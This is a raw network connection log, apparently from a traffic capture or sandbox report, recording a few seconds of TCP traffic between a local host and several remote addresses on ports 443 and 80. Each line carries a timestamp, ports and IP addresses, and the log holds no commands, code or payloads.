                                                                                                                                                                      Nov 21, 2024 06:23:53.533231974 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.533241034 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.627371073 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:53.627401114 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.627461910 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:53.628678083 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:53.628694057 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.909193993 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.909260988 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.909307003 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.909512997 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.909533024 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.935276985 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.935327053 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.936341047 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.936685085 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.936702967 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.981497049 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.981575966 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.981645107 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.981828928 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.981853008 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.981863022 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.981868982 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.984344006 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.984394073 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.984450102 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.984613895 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.984630108 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:54.238090038 CET44349812216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:54.238473892 CET49812443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:23:54.238486052 CET44349812216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:54.239727020 CET44349812216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:54.239794970 CET49812443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:23:54.240879059 CET49812443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:23:54.240948915 CET44349812216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:54.285713911 CET49812443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:23:54.285727024 CET44349812216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:54.335880995 CET49812443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:23:54.417083979 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:55.064357042 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.064920902 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.064941883 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.065380096 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.065387011 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.096724987 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.097253084 CET49814443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.097285032 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.097856998 CET49814443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.097877979 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.159230947 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.159333944 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:55.161456108 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:55.161465883 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.161793947 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.178210020 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.189944029 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.189982891 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.190632105 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.190638065 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.212645054 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:55.227606058 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:55.271332026 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.513910055 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.513940096 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.514008999 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.514019012 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.514065981 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.515965939 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.516000032 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.516014099 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.516020060 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.541446924 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.543879032 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.544717073 CET49814443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.620414019 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.620583057 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.624061108 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.710644007 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.710719109 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.710809946 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:55.785706997 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.793802977 CET49814443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.793803930 CET49814443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.793828964 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.793843031 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.795022011 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.795022011 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.795053959 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.795063972 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.795341969 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:55.795363903 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.795375109 CET49818443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:55.795382977 CET44349818184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.796825886 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.796842098 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.797651052 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.797660112 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.798930883 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.798955917 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.799274921 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.799694061 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.799711943 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.828032017 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.867955923 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.893695116 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.893781900 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.893866062 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.894905090 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.894917011 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.895445108 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.895457983 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:55.907547951 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:55.907581091 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.038239002 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.038274050 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.038376093 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.049927950 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.049946070 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.067987919 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:56.068031073 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.068208933 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:56.068697929 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:56.068713903 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.242712021 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.242754936 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.242831945 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.242852926 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.244831085 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.244888067 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.247673988 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.247693062 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.270893097 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.270927906 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.271297932 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.271548033 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.271564007 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.287378073 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.287399054 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.287466049 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.287523985 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.288321018 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.292104959 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.292166948 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.292577028 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.320997953 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.321034908 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.328272104 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.328318119 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.328397036 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.329745054 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.329756975 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.408315897 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.408360958 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.408453941 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.408863068 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.408901930 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.408977032 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.409184933 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.409200907 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:56.409414053 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:56.409425020 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.559345961 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.559417009 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:57.560714960 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:57.560724974 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.561134100 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.562378883 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:57.582812071 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.583318949 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:57.583347082 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.583753109 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:57.583759069 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.603336096 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.724805117 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.725474119 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:57.725558043 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.725943089 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:57.725960016 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.837007046 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.837481976 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:57.837507963 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:57.837944984 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:57.837950945 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.031373024 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.031399012 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.031466961 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.031488895 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.031800032 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.031811953 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.031893015 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.032011986 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.032052994 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.032104969 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.034498930 CET49832443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.034579039 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.034775972 CET49832443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.034910917 CET49832443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.034931898 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.056725979 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.057146072 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.057192087 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.057670116 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.057677031 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.117652893 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.117742062 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.117793083 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:58.130711079 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.143847942 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.143873930 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.144449949 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.144458055 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.145502090 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:58.145519972 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.145531893 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                      Nov 21, 2024 06:23:58.145539045 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.257584095 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.260621071 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.261336088 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.261359930 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.261457920 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.261477947 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.262404919 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.262461901 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.263114929 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.263184071 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.263864040 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.263942003 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.264081001 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.264091015 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.264167070 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.264254093 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.264302969 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.288341045 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.291260958 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.291353941 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.299787998 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.299809933 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.299822092 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.299829006 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.306049109 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.307377100 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.308053017 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.308054924 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.308065891 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.308135033 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.308201075 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.312695026 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.312695980 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.312756062 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.312786102 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.314913034 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.314941883 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.315077066 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.317321062 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.317363024 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.317428112 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.317564011 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.317575932 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.318370104 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.318393946 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.348289967 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.499213934 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.502310991 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.502373934 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.503019094 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.503038883 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.509725094 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.509754896 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.509844065 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.510833979 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.510848999 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.576292038 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.576370001 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.576415062 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.576622963 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.576656103 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.576674938 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.576682091 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.579354048 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.579440117 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.579699993 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.579848051 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.579880953 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.757531881 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.757550955 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.757581949 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.757590055 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.757611036 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.757654905 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.757667065 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.757678032 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.757710934 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.758977890 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.759011030 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.759021044 CET4434983013.107.246.45192.168.2.6
